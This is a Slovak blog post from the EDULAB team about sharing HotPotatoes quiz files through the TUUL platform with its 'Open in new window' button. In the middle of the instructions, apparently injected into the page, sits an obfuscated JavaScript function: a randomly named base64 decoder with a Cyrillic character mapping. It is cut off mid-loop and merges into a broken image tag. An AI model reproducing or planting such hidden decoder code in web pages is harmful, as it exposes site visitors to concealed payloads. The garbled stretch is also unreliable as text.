BLOG

HotPotatoes v TUULe

 
hot pot

Jedným z najobľúbenejších nástrojov na tvorbu testov, kvízov, krížoviek a doplňovačiek v našich končinách je HotPotatoes.

Malou nevýhodou bezplatnej verzie tohto nástroja je výstup. Pokiaľ svoj „výtvor“ chcete prezentovať pred triedou, export súboru vo formáte .htm (.html) spustíte zo svojho počítača v internetovom prehliadači. Problém nastáva, ak chcete súbor zdieľať so svojimi kolegami, nebodaj doma so žiakmi. Áno, môžete ho poslať e-mailom alebo ho zverejniť na svojej stránke, to ale vyžaduje znalosti zo správy internetovej stránky.

My vám ponúkame ďalšiu, jednoduchú cestu:

  • pridajte si svoj súbor z HotPotatoes do TUULu,
  • v informáciách o materiály pre ostatných používateľov napíšte, aby si tento materiál spustili v novom okne -na to slúži tlačidlo Otvoriť v novom okne, ktoré je umiestnené v pravom hornom roku obrazovky (prvé zľava v ovládaní TUULu)
  •  a hra môže začať.

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6ze-full wp-image-30357" alt="otvorit-v-novom-okne1" src="http://tuul.sk/wp-content/uploads/2014/02/otvorit-v-novom-okne1.png" width="1174" height="233" />

My ešte prezradíme, že toto tlačidlo sa dá využiť pri viacerých príležitostiach ;) Pre lepšiu ilustráciu si prezrite nasledujúci TUUL Otvoriť materiál v novom okne.

EDULAB tím